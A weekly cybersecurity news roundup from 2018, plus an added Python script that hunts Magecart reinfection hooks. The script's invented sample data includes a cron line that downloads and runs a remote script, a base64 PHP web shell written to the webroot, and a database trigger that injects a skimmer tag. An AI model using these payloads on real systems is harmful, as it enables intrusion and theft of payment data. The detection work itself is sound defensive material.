A Review of the Best News of the Week on Cyber Threats & Defense

China ‘has taken the gloves off’ in its thefts of U.S. technology secrets (LA Times, Nov 18 2018)
It was the great microchip heist — a stunning Chinese-backed effort that pilfered $8.75 billion in secret American technology. But the real secret is it wasn’t unusual. After a lull under President Obama, Chinese economic espionage is soaring again as U.S. relations with Beijing worsen.

Using Airport and Hotel Wi-Fi Is Much Safer Than It Used to Be (Wired, Nov 18 2018)
“What’s in it for the adversary? Why would you choose monkeying with the Wi-Fi at the airport or the hotel over some other attack method? When you look at the profitability and the risk, it just doesn’t make sense other than an amateur to be doing it for giggles.”

America’s Election Grid Remains a Patchwork of Vulnerabilities (The New York Times, Nov 17 2018)
The midterms showed that there aren’t enough qualified poll workers and that accusations of political manipulation persist. Still, the situation has improved since Bush v. Gore.




1 in 5 merchants compromised by Magecart get reinfected (Help Net Security, Nov 13 2018)
“Once an operative gains access to a merchant’s server, it is common to litter the site with backdoors and rogue admin accounts,” he explains. They also use reinfection mechanisms such as database triggers and hidden periodic tasks to reinstate their payload, obfuscation techniques to hide their malicious code, and have begun using zero-day vulnerabilities and exploits to gain a foothold on target sites.
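The two reinfection mechanisms named above, database triggers and hidden periodic tasks, are cheap to check for directly, and a practitioner cleaning a store should do so before declaring it clean. The script below is an added example for this roundup, not code from the report or the article: it scans a MySQL trigger listing (the columns `SHOW TRIGGERS` or `information_schema.TRIGGERS` return) and a crontab for the hooks a Magecart operator would leave behind. All inputs are constructed for the example: the trigger names and bodies, the table names, the crontab lines and the 203.0.113.7 address are invented, and the patterns are heuristics, not a complete indicator set.

```python
"""Hunt for Magecart-style reinfection hooks in a MySQL trigger listing and a crontab.

Added example for this roundup; not code from the Sansec report or Help Net Security.
Every input below is constructed to look like a compromised Magento store.
"""
import base64
import re

# Constructed sample: (TRIGGER_NAME, EVENT_OBJECT_TABLE, ACTION_STATEMENT), as you would
# get from: SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, ACTION_STATEMENT FROM information_schema.TRIGGERS
SAMPLE_TRIGGERS = [
    ("trg_stock_update", "cataloginventory_stock_item",
     "BEGIN UPDATE cataloginventory_stock_status SET qty = NEW.qty WHERE product_id = NEW.product_id; END"),
    # Re-injects a skimmer tag every time the head-includes config row is rewritten.
    ("before_insert_cms", "core_config_data",
     "BEGIN IF NEW.path = 'design/head/includes' THEN SET NEW.value = CONCAT(NEW.value, "
     "'<script src=\"https://cdn.example-analytics.net/jquery.min.js\"></script>'); END IF; END"),
    # Same idea, but the payload is hidden behind FROM_BASE64 ('PHNjcmlwdD4=' decodes to '<script>').
    ("after_update_pay", "sales_order_payment",
     "BEGIN INSERT INTO core_config_data (path, value) VALUES ('design/footer/absolute_footer', "
     "FROM_BASE64('PHNjcmlwdD4=')); END"),
]

# Constructed crontab: two legitimate Magento jobs and two reinfection tasks.
# The base64 string decodes to a one-line PHP web shell: <?php eval($_POST['c']);
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * /usr/bin/php /var/www/html/bin/magento cron:run
0 3 * * * /usr/bin/php /var/www/html/bin/magento indexer:reindex
*/10 * * * * curl -s http://203.0.113.7/up.txt | sh > /dev/null 2>&1
0 */6 * * * echo PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7 | base64 -d > /var/www/html/pub/media/cache.php
"""

TRIGGER_PATTERNS = {
    "html script tag": re.compile(r"<\s*script", re.I),
    "base64/hex decode in SQL": re.compile(r"\b(FROM_BASE64|UNHEX)\s*\(", re.I),
    "remote URL in trigger body": re.compile(r"https?://", re.I),
}
# Quoted SQL string literals made only of base64 characters; decoded and inspected below.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{8,}={0,2})'")

CRON_PATTERNS = {
    "download piped to shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "base64 decode on host": re.compile(r"base64\s+(-d|--decode)"),
    "writes PHP into webroot": re.compile(r">\s*/var/www/\S+\.php"),
}


def decoded_literals(sql):
    """Return the plaintext of every base64-looking string literal in a trigger body."""
    out = []
    for m in B64_LITERAL.finditer(sql):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error is a ValueError; not real base64, skip it
            pass
    return out


def scan_triggers(rows):
    """Flag triggers that write markup, decode payloads, or reference remote hosts."""
    findings = []
    for name, table, body in rows:
        reasons = [why for why, rx in TRIGGER_PATTERNS.items() if rx.search(body)]
        for text in decoded_literals(body):
            if re.search(r"<\s*script|eval\(", text, re.I):
                reasons.append("base64 literal decodes to script")
        if reasons:
            findings.append(("trigger", name, table, reasons))
    return findings


def scan_crontab(text):
    """Flag cron entries that fetch-and-execute, decode payloads, or drop PHP files."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = [why for why, rx in CRON_PATTERNS.items() if rx.search(line)]
        if reasons:
            findings.append(("cron", lineno, line.strip(), reasons))
    return findings


if __name__ == "__main__":
    for finding in scan_triggers(SAMPLE_TRIGGERS) + scan_crontab(SAMPLE_CRONTAB):
        print(finding)
```

On a real store the trigger rows come from the database user the shop runs as, and the crontab from every account on the box (not just the web user), since the article's point is that the hooks are placed wherever the operator's foothold reached. The decode step matters: a trigger body that reads `FROM_BASE64('...')` looks harmless to a `grep` for `<script`.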

Google and Cloudflare traffic diverted to China… do we need to panic? (Naked Security – Sophos, Nov 13 2018)
A brief outage on Monday diverted traffic to providers such as Google and Cloudflare via China – was it a blunder or a hack?

Google Services Inaccessible Due to BGP Leak (SecurityWeek, Nov 13 2018)
Important Google services were inaccessible for some users on Monday due to a BGP leak that caused traffic to be directed through Russia, China and Nigeria. It’s unclear if the incident was caused by a configuration issue or if it was the result of a malicious attack.


That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards (Krebs on Security, Nov 13 2018)
“If you own a domain name that gets decent traffic and you fail to pay its annual renewal fee, chances are this mistake will be costly for you and for others. Lately, neglected domains have been getting scooped up by crooks who use them to set up fake e-commerce sites that steal credit card details from unwary shoppers.”

Spectre, Meltdown researchers unveil 7 more speculative execution attacks (Ars Technica, Nov 13 2018)
Seven new possible attacks. Some are mitigated by known mitigation techniques, but others are not. That means further work is required to safeguard vulnerable systems.

Cranes Exposed to Possible Cyber-Sabotage—What We Can Learn (Infosecurity Magazine, Nov 14 2018)
Why the scenario of a hacked crane is a concern for wider cybersecurity.

Suspected Russian Hackers Impersonate State Department Aide (SecurityWeek, Nov 17 2018)
The “spear phishing” attempts began on Wednesday, sending e-mail messages purported to come from a department public affairs official.

Understanding Evil Twin AP Attacks and How to Prevent Them (Dark Reading, Nov 14 2018)
The attack surface remains largely unprotected from Wi-Fi threats that can result in stolen credentials and sensitive information as well as backdoor/malware payload drops.

Worst-Case Thinking Breeds Fear and Irrationality (Schneier on Security, Nov 18 2018)
Basically, someone sees a man and a little girl leaving a shopping center. Instead of thinking “it must be a father and daughter, which happens millions of times a day and is perfectly normal,” he thinks “this is obviously a case of child abduction and I must alert the authorities immediately.”…And they do, scrambling helicopters, searching cars leaving the shopping center, and going door-to-door looking for clues. Seven hours later, the police eventually came to realize that she was safe asleep in bed.

Sophisticated Campaign Targets Pakistan’s Air Force (Dark Reading, Nov 13 2018)
Espionage campaign uses a variety of new evasion techniques.

Comprehensive Guide on Hydra – A Brute Forcing Tool (Hacking Articles, Nov 13 2018)
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

GPUs are vulnerable to side-channel attacks (Network World Security, Nov 13 2018)
Researchers at UC Riverside discover GPUs can be victims of the same kinds of side-channel attacks as Meltdown and Spectre, which have impacted Intel and AMD CPUs.

Chinese Hackers Target UK Engineering Company: Report (SecurityWeek, Nov 14 2018)
Recent attacks on an engineering company in the United Kingdom were attributed to a China-related cyber-espionage group despite the use of techniques usually associated with Russian threat actors.

Dridex/Locky Operators Unleash New Malware in Recent Attack (SecurityWeek, Nov 15 2018)
The malware was picked up by TA505 last month and used in an attack on October 11, as part of an email campaign that used both Microsoft Word and Microsoft Publisher files for distribution purposes. The attack targeted users at commercial banking institutions.

DHS Task Force Moves Forward on Playbooks for Supply Chain Security (Dark Reading, Nov 16 2018)
Last week, the task force’s executive committee met for the first time as it started on the road to producing those DHS playbooks for both government and industry.

Many ATMs Can be Hacked in Minutes: Report (SecurityWeek, Nov 16 2018)
Many automated teller machines (ATMs) lack adequate security mechanisms and can be compromised in minutes using various methods, according to a new report from vulnerability assessment firm Positive Technologies.

Hackers Earn $1 Million for Zero-Day Exploits at Chinese Competition (SecurityWeek, Nov 19 2018)
White hat hackers earned more than $1 million for exploits disclosed at the Tianfu Cup PWN hacking competition that took place on November 16-17 in Chengdu, the capital of China’s Sichuan province.